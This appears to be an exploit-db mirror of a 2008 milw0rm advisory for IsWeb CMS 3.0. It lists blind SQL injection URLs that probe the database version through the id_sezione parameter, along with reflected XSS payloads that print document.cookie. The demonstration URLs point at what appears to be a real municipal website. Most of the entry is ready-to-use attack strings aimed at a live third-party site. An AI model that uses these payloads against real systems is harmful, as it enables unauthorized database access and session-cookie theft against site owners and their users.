exploit-db-mirror/exploits/php/webapps/7465.txt

[â– ]  IsWeb CMS v 3.0 ($qL/XsS) Multiple vulnerabilities

>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.cmsisweb.it

>---------------------------------------<


[â– ] BlinD $qL:

|: http://www.example.com/index.php?id_sezione=[$qL]

> DeM0:

|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=4 [No]

|: http://www.comune.avezzano.aq.it/index.php?id_sezione=297%20and%20substring(@@version,1,1)=5 [Ye$]


[â– ] XSS:

|: http://www.comune.avezzano.aq.it/index.php?azione=cerca
  In this modul (search) write:

  "><script>alert(document.cookie)</script>

or another vuln Page:

|: http://www.comune.avezzano.aq.it/index.php?id_doc=19&id_oggetto=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20XaDoS%3Ch1%3E%3C/marquee%3E

[â– ] Th4nKs::

\>Str0ke</ - \>Fuck you 007 hacker</ - \>Securitycode team</ - \>All italian hackers</

# milw0rm.com [2008-12-14]